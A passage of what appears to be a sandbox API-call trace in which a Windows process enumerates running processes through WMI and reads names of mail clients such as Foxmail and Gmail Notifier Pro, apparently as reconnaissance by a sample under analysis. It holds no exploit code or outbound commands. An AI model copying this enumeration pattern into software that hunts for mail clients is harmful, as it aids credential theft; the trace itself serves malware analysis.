(bstr="foxmailincmail.exe") returned 0x24 [0213.972] IWbemClassObject:Get (in: This=0x560e168, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ab34*=8, plFlavor=0x268ab38*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x268ab34*=8, plFlavor=0x268ab38*=0) returned 0x0 [0213.972] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0213.972] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0213.972] CoTaskMemAlloc (cb=0x4) returned 0x561bee8 [0213.972] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bee8, puReturned=0x267acc0 | out: apObjects=0x561bee8*=0x560e300, puReturned=0x267acc0*=0x1) returned 0x0 [0214.060] IUnknown:QueryInterface (in: This=0x560e300, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560e300) returned 0x0 [0214.060] IUnknown:QueryInterface (in: This=0x560e300, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.060] IUnknown:QueryInterface (in: This=0x560e300, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.060] IUnknown:AddRef (This=0x560e300) returned 0x3 [0214.060] IUnknown:QueryInterface (in: This=0x560e300, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.060] IUnknown:QueryInterface (in: This=0x560e300, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.061] IUnknown:QueryInterface (in: This=0x560e300, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560e304) returned 0x0 [0214.061] IMarshal:GetUnmarshalClass (in: This=0x560e304, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.061] IUnknown:Release (This=0x560e304) returned 0x3 [0214.061] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.061] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.061] IUnknown:QueryInterface (in: This=0x560e300, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.061] IUnknown:Release (This=0x560e300) returned 0x2 [0214.061] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.061] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.061] IUnknown:QueryInterface (in: This=0x560e300, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560e300) returned 0x0 [0214.061] IUnknown:AddRef (This=0x560e300) returned 0x4 [0214.061] IUnknown:Release (This=0x560e300) returned 0x3 [0214.061] IUnknown:Release (This=0x560e300) returned 0x2 [0214.061] CoTaskMemFree (pv=0x561bee8) [0214.061] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.061] IUnknown:AddRef (This=0x560e300) returned 0x3 [0214.062] IWbemClassObject:Get (in: This=0x560e300, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.062] IWbemClassObject:Get (in: This=0x560e300, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.062] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x66 [0214.062] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x66 [0214.062] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.062] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.062] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.063] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.063] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bee8) returned 0x0 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bee8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.064] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bee8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a740) returned 0x0 [0214.064] WbemDefPath:IUnknown:Release (This=0x561bee8) returned 0x0 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a740) returned 0x0 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.064] WbemDefPath:IUnknown:AddRef (This=0x561a740) returned 0x3 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bef8) returned 0x0 [0214.065] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bef8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.065] WbemDefPath:IUnknown:Release (This=0x561bef8) returned 0x3 [0214.065] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.065] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.065] WbemDefPath:IUnknown:Release (This=0x561a740) returned 0x2 [0214.065] WbemDefPath:IUnknown:Release (This=0x561a740) returned 0x1 [0214.065] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.065] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a740, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a740) returned 0x0 [0214.065] WbemDefPath:IUnknown:AddRef (This=0x561a740) returned 0x3 [0214.065] WbemDefPath:IUnknown:Release (This=0x561a740) returned 0x2 [0214.065] WbemDefPath:IWbemPath:SetText (This=0x561a740, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x0 [0214.065] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.065] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.065] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.065] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.065] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.066] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.066] IWbemClassObject:Get (in: This=0x560e300, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268b3c0*=0, plFlavor=0x268b3c4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x268b3c0*=8, plFlavor=0x268b3c4*=0) returned 0x0 [0214.066] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0214.066] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0214.066] IWbemClassObject:Get (in: This=0x560e300, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268b3c0*=8, plFlavor=0x268b3c4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x268b3c0*=8, plFlavor=0x268b3c4*=0) returned 0x0 [0214.066] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0214.066] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0214.066] CoTaskMemAlloc (cb=0x4) returned 0x561bf28 [0214.066] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bf28, puReturned=0x267acc0 | out: apObjects=0x561bf28*=0x560e498, puReturned=0x267acc0*=0x1) returned 0x0 [0214.067] IUnknown:QueryInterface (in: This=0x560e498, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560e498) returned 0x0 [0214.067] IUnknown:QueryInterface (in: This=0x560e498, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.067] IUnknown:QueryInterface (in: This=0x560e498, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.068] IUnknown:AddRef (This=0x560e498) returned 0x3 [0214.068] IUnknown:QueryInterface (in: This=0x560e498, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.068] IUnknown:QueryInterface (in: This=0x560e498, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.068] IUnknown:QueryInterface (in: This=0x560e498, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560e49c) returned 0x0 [0214.068] IMarshal:GetUnmarshalClass (in: This=0x560e49c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.068] IUnknown:Release (This=0x560e49c) returned 0x3 [0214.068] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.068] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.068] IUnknown:QueryInterface (in: This=0x560e498, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.068] IUnknown:Release (This=0x560e498) returned 0x2 [0214.068] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.068] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.068] IUnknown:QueryInterface (in: This=0x560e498, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560e498) returned 0x0 [0214.068] IUnknown:AddRef (This=0x560e498) returned 0x4 [0214.068] IUnknown:Release (This=0x560e498) returned 0x3 [0214.068] IUnknown:Release (This=0x560e498) returned 0x2 [0214.069] CoTaskMemFree (pv=0x561bf28) [0214.069] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.069] IUnknown:AddRef (This=0x560e498) returned 0x3 [0214.069] IWbemClassObject:Get (in: This=0x560e498, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.069] IWbemClassObject:Get (in: This=0x560e498, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.069] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x66 [0214.069] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x66 [0214.070] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.070] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.070] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.070] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.071] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bf28) returned 0x0 [0214.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bf28, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.071] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bf28, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a820) returned 0x0 [0214.071] WbemDefPath:IUnknown:Release (This=0x561bf28) returned 0x0 [0214.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a820) returned 0x0 [0214.071] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.072] WbemDefPath:IUnknown:AddRef (This=0x561a820) returned 0x3 [0214.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bf38) returned 0x0 [0214.072] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bf38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.072] WbemDefPath:IUnknown:Release (This=0x561bf38) returned 0x3 [0214.072] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.072] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.072] WbemDefPath:IUnknown:Release (This=0x561a820) returned 0x2 [0214.072] WbemDefPath:IUnknown:Release (This=0x561a820) returned 0x1 [0214.072] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.072] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a820, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a820) returned 0x0 [0214.072] WbemDefPath:IUnknown:AddRef (This=0x561a820) returned 0x3 [0214.072] WbemDefPath:IUnknown:Release (This=0x561a820) returned 0x2 [0214.072] WbemDefPath:IWbemPath:SetText (This=0x561a820, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x0 [0214.072] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.072] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.073] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.073] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, 